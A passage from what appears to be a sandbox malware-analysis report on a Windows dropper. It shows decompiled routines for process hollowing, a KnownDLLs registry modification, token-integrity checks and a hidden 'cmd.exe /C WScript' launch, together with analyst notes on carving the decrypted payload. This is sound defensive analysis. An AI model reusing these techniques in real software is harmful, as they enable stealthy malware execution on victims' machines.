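    img[raw_ptr:raw_ptr + 4] = b"\xCC" * 4      # int3 filler standing in for code
    return bytes(img)
```

Run hollow_plan() on the 0xe7c00-byte blob that E00401CE0 decrypts in place at 0x40c038 (carved from a dump of the dropper after the decryption call) to get the layout the child ends up with. The post_resume_header_wipe entry is the last write in the decompiled routine: five seconds after ResumeThread the first 0x138 bytes of the remote image are zeroed, so a dump of the hollowed child taken later has no usable MZ/PE headers; dump the child before the Sleep expires or take the image from the dropper instead.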
                                                                                                        Disassembly address column for E00405B80 (0x00405b80 - 0x00405e5a); the instruction text belonging to these addresses is not present on this page.
                                                                                                        0x00405d90
                                                                                                        0x00405da0
                                                                                                        0x00405da6
                                                                                                        0x00405da8
                                                                                                        0x00000000
                                                                                                        0x00405dae
                                                                                                        0x00405db1
                                                                                                        0x00405db6
                                                                                                        0x00405db8
                                                                                                        0x00000000
                                                                                                        0x00405dba
                                                                                                        0x00405dbf
                                                                                                        0x00405dd9
                                                                                                        0x00405ddb
                                                                                                        0x00405ddd
                                                                                                        0x00405de7
                                                                                                        0x00405e02
                                                                                                        0x00405e0f
                                                                                                        0x00405e0f
                                                                                                        0x00405e1e
                                                                                                        0x00405e23
                                                                                                        0x00405e2e
                                                                                                        0x00405e2e
                                                                                                        0x00405db8
                                                                                                        0x00405da8
                                                                                                        0x00405d25
                                                                                                        0x00405d25
                                                                                                        0x00405d28
                                                                                                        0x00405d2a
                                                                                                        0x00405d30
                                                                                                        0x00405d49
                                                                                                        0x00405d4e
                                                                                                        0x00405d50
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d5a
                                                                                                        0x00405d5b
                                                                                                        0x00405d5e
                                                                                                        0x00405d60
                                                                                                        0x00000000
                                                                                                        0x00405d62
                                                                                                        0x00405d62
                                                                                                        0x00000000
                                                                                                        0x00405d62
                                                                                                        0x00000000
                                                                                                        0x00405d60
                                                                                                        0x00000000
                                                                                                        0x00405d30
                                                                                                        0x00405d23
                                                                                                        0x00405d11
                                                                                                        0x00405cae
                                                                                                        0x00405cb3
                                                                                                        0x00405cb5
                                                                                                        0x00000000
                                                                                                        0x00405cb7
                                                                                                        0x00405cc2
                                                                                                        0x00405cc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cc4
                                                                                                        0x00405cb5
                                                                                                        0x00405cac
                                                                                                        0x00405c9e
                                                                                                        0x00405c79
                                                                                                        0x00405c60
                                                                                                        0x00405bc6
                                                                                                        0x00405bd7
                                                                                                        0x00405bdc
                                                                                                        0x00405bdf
                                                                                                        0x00405be6
                                                                                                        0x00000000
                                                                                                        0x00405be8
                                                                                                        0x00405bee
                                                                                                        0x00405bee
                                                                                                        0x00405be6
                                                                                                        0x00000000

APIs
• CreateProcessW.KERNEL32 ref: 00405C58
• GetThreadContext.KERNEL32(I@,00010007,00000000,?,?,?,?,?,I@,?,?,?), ref: 00405C71
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,I@,?,?,?), ref: 00405C96
• SetThreadContext.KERNEL32(?,?,?,?,00000000,3875F923,00000004,?,?,00000000,?,0040C038,?,?,?,?), ref: 00405DA0
• Sleep.KERNEL32(00001388,?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DBF
• VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DD3
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000040), ref: 00405E0F
• CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E1E
• CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E23
Strings
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
• String ID: 0125789244697858$D$I@$I@
• API String ID: 1428767187-3701513222
• Opcode ID: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
• Instruction ID: 2b955a6b4a58cd15ef933bbb3afc0f250c4904853c31c428a9eccdac0ead69e9
• Opcode Fuzzy Hash: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
• Instruction Fuzzy Hash: 91819071A40619ABEB109B90DD46FAFB7B8FB04704F044176FA04B62D0E775AA50CB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E00405A50(void* __ecx, void* _a4, void* _a8, long* _a12, char _a16) {
	void* _v8;
	void* _t31;
	int _t32;
	int _t36;
	void* _t44;
	long _t46;
	void* _t56;
	void* _t60;

	 *_a12 = 0;
	_t2 =  &_a16; // 0x40563b
	 *( *_t2) = 0;
	_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
	if(_t56 == 0) {
		L3:
		return 0;
	} else {
		if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
			if( *_t56 != 0x5a4d) {
				goto L2;
			} else {
				_v8 =  *((intOrPtr*)(_t56 + 0x3c));
				VirtualFree(_t56, 0, 0x8000);
				_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
				if(_t44 == 0) {
					L11:
					return 0;
				} else {
					_t31 = _a8 + _v8;
					_v8 = _t31;
					_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
					_push(0x8000);
					_push(0);
					_push(_t44);
					if(_t32 == 0 ||  *_t44 != 0x4550) {
						L10:
						VirtualFree();
						goto L11;
					} else {
						VirtualFree();
						_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
						_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
						if(_t60 == 0) {
							goto L11;
						} else {
							_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
							_push(0x8000);
							_push(0);
							_push(_t60);
							if(_t36 != 0) {
								if( *_t60 != 0x4550) {
									goto L10;
								} else {
									 *_a12 =  *(_t60 + 0x50);
									_t17 =  &_a16; // 0x40563b
									 *((intOrPtr*)( *_t17)) =  *((intOrPtr*)(_t60 + 0x28));
									VirtualFree(??, ??, ??);
									return 1;
								}
							} else {
								goto L10;
							}
						}
					}
				}
			}
		} else {
			L2:
			VirtualFree(_t56, 0, 0x8000);
			goto L3;
		}
	}
}


APIs
• VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,75145B60,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A79
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A8C
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405A9E
• VirtualFree.KERNEL32(00000000,00000000,00008000,I@,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405ACB
• VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AD8
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AF2
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B10
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B1F
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B35
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B47
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B6A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                        • String ID: ;V@$I@
                                                                                                        • API String ID: 1260273505-1952863460
                                                                                                        • Opcode ID: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                        • Instruction ID: 663560f153661f58489f41854f68c215dbd6861c452647dabd8b659e9ddec512
                                                                                                        • Opcode Fuzzy Hash: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                        • Instruction Fuzzy Hash: C4314F71741714BBEB309F95DC41F9B7BA8EB05B11F100065FB04AB2D1D6B5AD008FA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E004082B0(intOrPtr _a4) {
                                                                                                        				void* _v8;
                                                                                                        				long _v12;
                                                                                                        				void* _t20;
                                                                                                        				void* _t27;
                                                                                                        				void* _t34;
                                                                                                        				void* _t37;
                                                                                                        				void* _t38;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
                                                                                                        					L4:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
                                                                                                        						_t20 = E004015E0(_v12);
                                                                                                        						_t38 = _t37 + 4;
                                                                                                        						_t34 = _t20;
                                                                                                        						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
                                                                                                        							_push(_t34);
                                                                                                        							goto L8;
                                                                                                        						} else {
                                                                                                        							_t27 = E00407AA0( *_t34, _a4);
                                                                                                        							_t38 = _t38 + 8;
                                                                                                        							_push(_t34);
                                                                                                        							if(_t27 == 0) {
                                                                                                        								L8:
                                                                                                        								E00401510();
                                                                                                        								CloseHandle(_v8);
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								E00401510();
                                                                                                        								CloseHandle(_v8);
                                                                                                        								return 1;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						CloseHandle(_v8);
                                                                                                        						goto L4;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 004082CA
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004082D1
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004082E8
                                                                                                        • GetLastError.KERNEL32 ref: 004082F2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408300
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00408327
                                                                                                        • IsValidSid.ADVAPI32(00000000), ref: 00408333
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408349
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408373
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832165296-0
                                                                                                        • Opcode ID: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                        • Instruction ID: 6c80d8c1505064fb5d23a14c91f2f6bbea28928c87bc453829ba29e9ce75709a
                                                                                                        • Opcode Fuzzy Hash: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                        • Instruction Fuzzy Hash: F5215E31A00108FBEF116FA0EE0AB9E7FB9EF54745F1000B5F945F51A1EB768E109A99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00408390(long* _a4) {
                                                                                                        				long _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t35 = OpenProcess(0x1000, 0,  *_a4);
                                                                                                        				if(_t35 == 0) {
                                                                                                        					ExitThread(0);
                                                                                                        				}
                                                                                                        				while(1) {
                                                                                                        					_v8 = 0;
                                                                                                        					if(GetExitCodeProcess(_t35,  &_v8) == 0 || (0 | _v8 == 0x00000103) == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					Sleep(0x7d0);
                                                                                                        				}
                                                                                                        				CloseHandle(_t35);
                                                                                                        				E00401BB0( &_v92, 0, 0x44);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movups [ebp-0x14], xmm0");
                                                                                                        				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                        				CloseHandle(_v24.hThread);
                                                                                                        				CloseHandle(_v24);
                                                                                                        				ExitThread(_v24.dwProcessId);
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004083A5
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 004083CD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 004083E8
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004083F3
                                                                                                        • CreateProcessW.KERNEL32 ref: 0040842C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408435
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040843A
                                                                                                        • ExitThread.KERNEL32 ref: 0040843F
                                                                                                        • ExitThread.KERNEL32 ref: 00408447
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1465093181-0
                                                                                                        • Opcode ID: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                        • Instruction ID: 538b4140d65d2fd151ab259c2702cab8e281b3ea1c27d0cfeab488a6800ad3c5
                                                                                                        • Opcode Fuzzy Hash: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                        • Instruction Fuzzy Hash: 64114971A40319BBEB11DBA4DE45F9F7B78AF04741F140025B604BA1D1DBB4AE40CB99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402DD0(void* __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				long _t8;
                                                                                                        
                                                                                                        				_t1 =  &_v8; // 0x402f21
                                                                                                        				_v8 = 0;
                                                                                                        				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f, _t1);
                                                                                                        				if(_t8 == 0) {
                                                                                                        					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E00401B40(L"ntdll.dll") * 2);
                                                                                                        					return RegCloseKey(_v8);
                                                                                                        				}
                                                                                                        				return _t8;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,!/@), ref: 00402DF0
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 00402E20
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenValue
                                                                                                        • String ID: !/@$SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                        • API String ID: 779948276-871150387
                                                                                                        • Opcode ID: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                        • Instruction ID: 484440f86f87c03b30c3bb65dbd638c5ca07b71e5d6230add0e59dd50d7b01eb
                                                                                                        • Opcode Fuzzy Hash: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                        • Instruction Fuzzy Hash: E6F0A071680208BBEB119B91DE0BFAA7678E744B04F200076FA01B11E2E6B56E14D648
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00406CA0(intOrPtr _a4) {
                                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                                        				struct _STARTUPINFOW _v88;
                                                                                                        				short _v1128;
                                                                                                        				long _t25;
                                                                                                        
                                                                                                        				E00401BB0( &_v88, 0, 0x44);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movups [ebp-0x10], xmm0");
                                                                                                        				E00401A00( &_v1128, L"cmd.exe /C WScript \"");
                                                                                                        				E00401970( &_v1128, _a4 - 0xffffff80);
                                                                                                        				E00401970( &_v1128, "\"");
                                                                                                        				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                        				if(_t25 != 0) {
                                                                                                        					CloseHandle(_v20.hThread);
                                                                                                        					CloseHandle(_v20);
                                                                                                        					ExitThread(_v20.dwProcessId);
                                                                                                        				}
                                                                                                        				ExitThread(_t25);
                                                                                                        			}
                                                                                                        0x00406cb1
                                                                                                        0x00406cbc
                                                                                                        0x00406cc5
                                                                                                        0x00406cc9
                                                                                                        0x00406cdc
                                                                                                        0x00406ced
                                                                                                        0x00406d15
                                                                                                        0x00406d1d
                                                                                                        0x00406d29
                                                                                                        0x00406d32
                                                                                                        0x00406d3b
                                                                                                        0x00406d3b
                                                                                                        0x00406d20

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleThread$CreateProcess
                                                                                                        • String ID: cmd.exe /C WScript "
                                                                                                        • API String ID: 3397019416-3599441821
                                                                                                        • Opcode ID: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                        • Instruction ID: eef6df8135acf94fe22a1234d31cd8a2743a9bcf06af6411463f708c953a90e9
                                                                                                        • Opcode Fuzzy Hash: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                        • Instruction Fuzzy Hash: 05111BB1A40319BAEB10ABE0CE4AF9E777CAF15700F500176B305B50E2E779AA54CB5D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408270(void* __ecx, char _a4) {
                                                                                                        				char _v8;
                                                                                                        				_Unknown_base(*)()* _t6;
                                                                                                        				void* _t8;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                                                                                        				if(_t6 == 0) {
                                                                                                        					L3:
                                                                                                        					return _v8;
                                                                                                        				} else {
                                                                                                        					_t3 =  &_a4; // 0x403432
                                                                                                        					_t8 =  *_t6( *_t3,  &_v8);
                                                                                                        					if(_t8 != 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						return _t8;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x0040827e
                                                                                                        0x0040828c
                                                                                                        0x00408294
                                                                                                        0x004082a7
                                                                                                        0x004082ad
                                                                                                        0x00408296
                                                                                                        0x0040829a
                                                                                                        0x0040829d
                                                                                                        0x004082a1
                                                                                                        0x00000000
                                                                                                        0x004082a6
                                                                                                        0x004082a6
                                                                                                        0x004082a6
                                                                                                        0x004082a1

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: 24@$IsWow64Process$kernel32
                                                                                                        • API String ID: 1646373207-2506754407
                                                                                                        • Opcode ID: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                        • Instruction ID: 4e0a41bddc85eb87f205be8107a504d095728719a775a610ae93757d078e0763
                                                                                                        • Opcode Fuzzy Hash: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                        • Instruction Fuzzy Hash: 6CE04F71644309ABDB10DBD0DE09B6E77ACDF41345F1441EDB808A2290EA799E109659
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004016A0(void* _a4, char _a8) {
                                                                                                        				long _t5;
                                                                                                        				long _t9;
                                                                                                        
                                                                                                        				_t1 =  &_a8; // 0x404d23
                                                                                                        				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4,  *_t1);
                                                                                                        				_t9 = _t5;
                                                                                                        				if(_t9 == 0) {
                                                                                                        					HeapFree(GetProcessHeap(), _t5, _a4);
                                                                                                        					return _t9;
                                                                                                        				}
                                                                                                        				return _t5;
                                                                                                        			}
                                                                                                        0x004016a4
                                                                                                        0x004016b3
                                                                                                        0x004016b9
                                                                                                        0x004016bd
                                                                                                        0x004016ca
                                                                                                        0x00000000
                                                                                                        0x004016d0
                                                                                                        0x004016d4

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,#M@,00000000,?,00404D23,00000000,00000000), ref: 004016AC
                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016B3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00404D23,00000000,00000000), ref: 004016C3
                                                                                                        • HeapFree.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                        • String ID: #M@
                                                                                                        • API String ID: 756756679-4131475827
                                                                                                        • Opcode ID: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                        • Instruction ID: ff7cb380345909262a6c5e90b85417ef13bbf769aef9ce5e450cfb0b8575ba0d
                                                                                                        • Opcode Fuzzy Hash: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                        • Instruction Fuzzy Hash: 24E0EC36900214BBCF111FE5AD1CA9A3F2DEB087A2F048424FB0DE6221C635CD20DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408CE0() {
                                                                                                        				_Unknown_base(*)()* _t2;
                                                                                                        				signed int _t3;
                                                                                                        				signed int _t5;
                                                                                                        				void* _t9;
                                                                                                        
                                                                                                        				 *0x5d2e0c = 0x11c;
                                                                                                        				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
                                                                                                        				if(_t2 != 0) {
                                                                                                        					 *_t2(0x5d2e0c);
                                                                                                        				}
                                                                                                        				_t3 =  *0x5d2e10; // 0xa
                                                                                                        				if(_t3 == 0) {
                                                                                                        					L22:
                                                                                                        					return _t3;
                                                                                                        				} else {
                                                                                                        					_t5 = _t3 << 0x00000008 |  *0x5d2e14;
                                                                                                        					_t9 = _t5 - 0x602;
                                                                                                        					if(_t9 > 0) {
                                                                                                        						if(_t5 == 0x603) {
                                                                                                        							 *0x5d2e08 = 4;
                                                                                                        							return _t5;
                                                                                                        						}
                                                                                                        						if(_t5 == 0xa00) {
                                                                                                        							_t3 =  *0x5d2e18; // 0x42ee
                                                                                                        							if(_t3 < 0x3fab) {
                                                                                                        								if(_t3 < 0x3ad7) {
                                                                                                        									if(_t3 < 0x3839) {
                                                                                                        										if(_t3 < 0x295a) {
                                                                                                        											goto L22;
                                                                                                        										} else {
                                                                                                        											 *0x5d2e08 = 5;
                                                                                                        											return _t3;
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										 *0x5d2e08 = 6;
                                                                                                        										return _t3;
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									 *0x5d2e08 = 7;
                                                                                                        									return _t3;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								 *0x5d2e08 = 8;
                                                                                                        								return _t3;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						if(_t9 == 0) {
                                                                                                        							 *0x5d2e08 = 3;
                                                                                                        							return _t5;
                                                                                                        						} else {
                                                                                                        							if(_t5 == 0x501) {
                                                                                                        								 *0x5d2e08 = 1;
                                                                                                        								return _t5;
                                                                                                        							} else {
                                                                                                        								if(_t5 != 0x601) {
                                                                                                        									L12:
                                                                                                        									 *0x5d2e08 = 0;
                                                                                                        									return _t5;
                                                                                                        								} else {
                                                                                                        									 *0x5d2e08 = 2;
                                                                                                        									return _t5;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x00408cea
                                                                                                        0x00408cfb
                                                                                                        0x00408d03
                                                                                                        0x00408d0a
                                                                                                        0x00408d0a
                                                                                                        0x00408d0c
                                                                                                        0x00408d13
                                                                                                        0x00408dca
                                                                                                        0x00408dca
                                                                                                        0x00408d19
                                                                                                        0x00408d1c
                                                                                                        0x00408d22
                                                                                                        0x00408d27
                                                                                                        0x00408d5f
                                                                                                        0x00408dc0
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,00408DD5,00403448), ref: 00408CF4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00408CFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                        • Opcode ID: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                        • Instruction ID: 26c57fc426f1e3111cd77027b938fa7e90139beecd20d4fae7029aa442a0f424
                                                                                                        • Opcode Fuzzy Hash: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                        • Instruction Fuzzy Hash: 09110D751112008BEB25CF10DF9872A3799EB71700FA8497BD040E52E0CBFC85D9EA4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			// Returns the module handle for the name in _a4; the module is loaded
                                                                                                        			// only when it is not already mapped into the process.
                                                                                                        			E00408B00(CHAR* _a4) {
                                                                                                        				struct HINSTANCE__* _t3;
                                                                                                        
                                                                                                        				_t1 =  &_a4; // 0x402b26
                                                                                                        				_t3 = GetModuleHandleA( *_t1);
                                                                                                        				if(_t3 == 0) {
                                                                                                        					return LoadLibraryA(_a4); // not yet loaded: map it now
                                                                                                        				}
                                                                                                        				return _t3;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(&+@,?,00402B26,?), ref: 00408B06
                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,00402B26,?), ref: 00408B13
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                        • String ID: &+@
                                                                                                        • API String ID: 4133054770-3274530745
                                                                                                        • Opcode ID: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                        • Instruction ID: 6061ff5d45b2c9477c6e6c8a5bdf30d78efc3d99e478dc08a0e6e8702b224e8b
                                                                                                        • Opcode Fuzzy Hash: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                        • Instruction Fuzzy Hash: 37C04C70100148EBDF011F62ED089993F6DEB416957408035F84DA4132DB369D519A98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 85%
